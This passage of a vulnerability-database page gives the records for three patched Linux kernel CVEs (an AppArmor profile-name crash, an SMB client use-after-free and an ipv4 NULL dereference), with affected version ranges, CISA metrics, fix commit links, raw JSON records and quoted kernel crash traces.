Unaffected: 6.1.75 , ≤ 6.1.* (semver)
Unaffected: 6.6.14 , ≤ 6.6.* (semver)
Unaffected: 6.7.2 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52443",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-22T18:29:41.510350Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:01.497Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T22:55:41.517Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9286ee97aa4803d99185768735011d0d65827c9e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1d8e62b5569cc1466ceb8a7e4872cf10160a9dcf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5ff00408e5029d3550ee77f62dc15f1e15c47f87"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0a12db736edbb4933e4274932aeea594b5876fa4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9d4fa5fe2b1d56662afd14915a73b4d0783ffa45"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5c0392fdafb0a2321311900be83ffa572bef8203"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/77ab09b92f16c8439a948d1af489196953dc4a0e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/55a8210c9e7d21ff2644809699765796d4bfb200"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "security/apparmor/policy_unpack.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9286ee97aa4803d99185768735011d0d65827c9e",
              "status": "affected",
              "version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
              "versionType": "git"
            },
            {
              "lessThan": "1d8e62b5569cc1466ceb8a7e4872cf10160a9dcf",
              "status": "affected",
              "version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
              "versionType": "git"
            },
            {
              "lessThan": "5ff00408e5029d3550ee77f62dc15f1e15c47f87",
              "status": "affected",
              "version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
              "versionType": "git"
            },
            {
              "lessThan": "0a12db736edbb4933e4274932aeea594b5876fa4",
              "status": "affected",
              "version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
              "versionType": "git"
            },
            {
              "lessThan": "9d4fa5fe2b1d56662afd14915a73b4d0783ffa45",
              "status": "affected",
              "version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
              "versionType": "git"
            },
            {
              "lessThan": "5c0392fdafb0a2321311900be83ffa572bef8203",
              "status": "affected",
              "version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
              "versionType": "git"
            },
            {
              "lessThan": "77ab09b92f16c8439a948d1af489196953dc4a0e",
              "status": "affected",
              "version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
              "versionType": "git"
            },
            {
              "lessThan": "55a8210c9e7d21ff2644809699765796d4bfb200",
              "status": "affected",
              "version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "security/apparmor/policy_unpack.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.11"
            },
            {
              "lessThan": "4.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.306",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.268",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.209",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.148",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.75",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.14",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.306",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.268",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.209",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.148",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.75",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.14",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.2",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\napparmor: avoid crash when parsed profile name is empty\n\nWhen processing a packed profile in unpack_profile() described like\n\n \"profile :ns::samba-dcerpcd /usr/lib*/samba/{,samba/}samba-dcerpcd {...}\"\n\na string \":samba-dcerpcd\" is unpacked as a fully-qualified name and then\npassed to aa_splitn_fqname().\n\naa_splitn_fqname() treats \":samba-dcerpcd\" as only containing a namespace.\nThus it returns NULL for tmpname, meanwhile tmpns is non-NULL. Later\naa_alloc_profile() crashes as the new profile name is NULL now.\n\ngeneral protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\nCPU: 6 PID: 1657 Comm: apparmor_parser Not tainted 6.7.0-rc2-dirty #16\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014\nRIP: 0010:strlen+0x1e/0xa0\nCall Trace:\n \u003cTASK\u003e\n ? strlen+0x1e/0xa0\n aa_policy_init+0x1bb/0x230\n aa_alloc_profile+0xb1/0x480\n unpack_profile+0x3bc/0x4960\n aa_unpack+0x309/0x15e0\n aa_replace_profiles+0x213/0x33c0\n policy_update+0x261/0x370\n profile_replace+0x20e/0x2a0\n vfs_write+0x2af/0xe00\n ksys_write+0x126/0x250\n do_syscall_64+0x46/0xf0\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n \u003c/TASK\u003e\n---[ end trace 0000000000000000 ]---\nRIP: 0010:strlen+0x1e/0xa0\n\nIt seems such behaviour of aa_splitn_fqname() is expected and checked in\nother places where it is called (e.g. aa_remove_profiles). Well, there\nis an explicit comment \"a ns name without a following profile is allowed\"\ninside.\n\nAFAICS, nothing can prevent unpacked \"name\" to be in form like\n\":samba-dcerpcd\" - it is passed from userspace.\n\nDeny the whole profile set replacement in such case and inform user with\nEPROTO and an explaining message.\n\nFound by Linux Verification Center (linuxtesting.org)."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T07:36:39.239Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9286ee97aa4803d99185768735011d0d65827c9e"
        },
        {
          "url": "https://git.kernel.org/stable/c/1d8e62b5569cc1466ceb8a7e4872cf10160a9dcf"
        },
        {
          "url": "https://git.kernel.org/stable/c/5ff00408e5029d3550ee77f62dc15f1e15c47f87"
        },
        {
          "url": "https://git.kernel.org/stable/c/0a12db736edbb4933e4274932aeea594b5876fa4"
        },
        {
          "url": "https://git.kernel.org/stable/c/9d4fa5fe2b1d56662afd14915a73b4d0783ffa45"
        },
        {
          "url": "https://git.kernel.org/stable/c/5c0392fdafb0a2321311900be83ffa572bef8203"
        },
        {
          "url": "https://git.kernel.org/stable/c/77ab09b92f16c8439a948d1af489196953dc4a0e"
        },
        {
          "url": "https://git.kernel.org/stable/c/55a8210c9e7d21ff2644809699765796d4bfb200"
        }
      ],
      "title": "apparmor: avoid crash when parsed profile name is empty",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52443",
    "datePublished": "2024-02-22T16:13:31.154Z",
    "dateReserved": "2024-02-20T12:30:33.291Z",
    "dateUpdated": "2025-05-04T07:36:39.239Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35864 (GCVE-0-2024-35864)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2026-01-05 11:37

Title

smb: client: fix potential UAF in smb2_is_valid_lease_break()

Summary

In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential UAF in smb2_is_valid_lease_break() Skip sessions that are being teared down (status == SES_EXITING) to avoid UAF.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c868cabdf6fdd61be…
	https://git.kernel.org/stable/c/f92739fdd4522c429…
	https://git.kernel.org/stable/c/a8344e2b69bde63f7…
	https://git.kernel.org/stable/c/705c76fbf726c7a2f…

Impacted products

Vendor

Product

Version

Linux

Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < c868cabdf6fdd61bea54532271f4708254e57fc5 (git)
Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < f92739fdd4522c4291277136399353d7c341fae4 (git)
Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < a8344e2b69bde63f713b0aa796d70dbeadffddfb (git)
Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < 705c76fbf726c7a2f6ff9143d4013b18daaaebf1 (git)
Affected: a67172a013953664b1dad03c648200c70b90506c (git)

Linux

Affected: 3.13
Unaffected: 0 , < 3.13 (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35864",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-29T18:32:19.453857Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:05.415Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.471Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c868cabdf6fdd61bea54532271f4708254e57fc5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f92739fdd4522c4291277136399353d7c341fae4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a8344e2b69bde63f713b0aa796d70dbeadffddfb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/705c76fbf726c7a2f6ff9143d4013b18daaaebf1"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/smb2misc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c868cabdf6fdd61bea54532271f4708254e57fc5",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "f92739fdd4522c4291277136399353d7c341fae4",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "a8344e2b69bde63f713b0aa796d70dbeadffddfb",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "705c76fbf726c7a2f6ff9143d4013b18daaaebf1",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a67172a013953664b1dad03c648200c70b90506c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/smb2misc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.13"
            },
            {
              "lessThan": "3.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.12.48",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential UAF in smb2_is_valid_lease_break()\n\nSkip sessions that are being teared down (status == SES_EXITING) to\navoid UAF."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T11:37:28.946Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c868cabdf6fdd61bea54532271f4708254e57fc5"
        },
        {
          "url": "https://git.kernel.org/stable/c/f92739fdd4522c4291277136399353d7c341fae4"
        },
        {
          "url": "https://git.kernel.org/stable/c/a8344e2b69bde63f713b0aa796d70dbeadffddfb"
        },
        {
          "url": "https://git.kernel.org/stable/c/705c76fbf726c7a2f6ff9143d4013b18daaaebf1"
        }
      ],
      "title": "smb: client: fix potential UAF in smb2_is_valid_lease_break()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35864",
    "datePublished": "2024-05-19T08:34:22.936Z",
    "dateReserved": "2024-05-17T13:50:33.107Z",
    "dateUpdated": "2026-01-05T11:37:28.946Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36008 (GCVE-0-2024-36008)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:48 – Updated: 2025-05-04 09:10

Title

ipv4: check for NULL idev in ip_route_use_hint()

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv4: check for NULL idev in ip_route_use_hint() syzbot was able to trigger a NULL deref in fib_validate_source() in an old tree [1]. It appears the bug exists in latest trees. All calls to __in_dev_get_rcu() must be checked for a NULL result. [1] general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 2 PID: 3257 Comm: syz-executor.3 Not tainted 5.10.0-syzkaller #0 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:fib_validate_source+0xbf/0x15a0 net/ipv4/fib_frontend.c:425 Code: 18 f2 f2 f2 f2 42 c7 44 20 23 f3 f3 f3 f3 48 89 44 24 78 42 c6 44 20 27 f3 e8 5d 88 48 fc 4c 89 e8 48 c1 e8 03 48 89 44 24 18 <42> 80 3c 20 00 74 08 4c 89 ef e8 d2 15 98 fc 48 89 5c 24 10 41 bf RSP: 0018:ffffc900015fee40 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff88800f7a4000 RCX: ffff88800f4f90c0 RDX: 0000000000000000 RSI: 0000000004001eac RDI: ffff8880160c64c0 RBP: ffffc900015ff060 R08: 0000000000000000 R09: ffff88800f7a4000 R10: 0000000000000002 R11: ffff88800f4f90c0 R12: dffffc0000000000 R13: 0000000000000000 R14: 0000000000000000 R15: ffff88800f7a4000 FS: 00007f938acfe6c0(0000) GS:ffff888058c00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f938acddd58 CR3: 000000001248e000 CR4: 0000000000352ef0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: ip_route_use_hint+0x410/0x9b0 net/ipv4/route.c:2231 ip_rcv_finish_core+0x2c4/0x1a30 net/ipv4/ip_input.c:327 ip_list_rcv_finish net/ipv4/ip_input.c:612 [inline] ip_sublist_rcv+0x3ed/0xe50 net/ipv4/ip_input.c:638 ip_list_rcv+0x422/0x470 net/ipv4/ip_input.c:673 __netif_receive_skb_list_ptype net/core/dev.c:5572 [inline] __netif_receive_skb_list_core+0x6b1/0x890 net/core/dev.c:5620 __netif_receive_skb_list net/core/dev.c:5672 [inline] netif_receive_skb_list_internal+0x9f9/0xdc0 net/core/dev.c:5764 netif_receive_skb_list+0x55/0x3e0 net/core/dev.c:5816 xdp_recv_frames net/bpf/test_run.c:257 [inline] xdp_test_run_batch net/bpf/test_run.c:335 [inline] bpf_test_run_xdp_live+0x1818/0x1d00 net/bpf/test_run.c:363 bpf_prog_test_run_xdp+0x81f/0x1170 net/bpf/test_run.c:1376 bpf_prog_test_run+0x349/0x3c0 kernel/bpf/syscall.c:3736 __sys_bpf+0x45c/0x710 kernel/bpf/syscall.c:5115 __do_sys_bpf kernel/bpf/syscall.c:5201 [inline] __se_sys_bpf kernel/bpf/syscall.c:5199 [inline] __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5199

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7da0f91681c4902bc…
	https://git.kernel.org/stable/c/03b5a9b2b526862b2…
	https://git.kernel.org/stable/c/7a25bfd12733a8f38…
	https://git.kernel.org/stable/c/8240c7308c941db4d…
	https://git.kernel.org/stable/c/c71ea3534ec0936fc…
	https://git.kernel.org/stable/c/58a4c9b1e5a3e53c9…

Impacted products

Vendor

Product

Version

Linux

Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < 7da0f91681c4902bc5c210356fdd963b04d5d1d4 (git)
Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < 03b5a9b2b526862b21bcc31976e393a6e63785d1 (git)
Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < 7a25bfd12733a8f38f8ca47c581f876c3d481ac0 (git)
Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < 8240c7308c941db4d9a0a91b54eca843c616a655 (git)
Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < c71ea3534ec0936fc57e6fb271c7cc6a2f68c295 (git)
Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < 58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1 (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36008",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T14:05:40.708798Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:45.179Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.519Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7da0f91681c4902bc5c210356fdd963b04d5d1d4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/03b5a9b2b526862b21bcc31976e393a6e63785d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7a25bfd12733a8f38f8ca47c581f876c3d481ac0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8240c7308c941db4d9a0a91b54eca843c616a655"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c71ea3534ec0936fc57e6fb271c7cc6a2f68c295"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/route.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7da0f91681c4902bc5c210356fdd963b04d5d1d4",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            },
            {
              "lessThan": "03b5a9b2b526862b21bcc31976e393a6e63785d1",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            },
            {
              "lessThan": "7a25bfd12733a8f38f8ca47c581f876c3d481ac0",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            },
            {
              "lessThan": "8240c7308c941db4d9a0a91b54eca843c616a655",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            },
            {
              "lessThan": "c71ea3534ec0936fc57e6fb271c7cc6a2f68c295",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            },
            {
              "lessThan": "58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/route.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
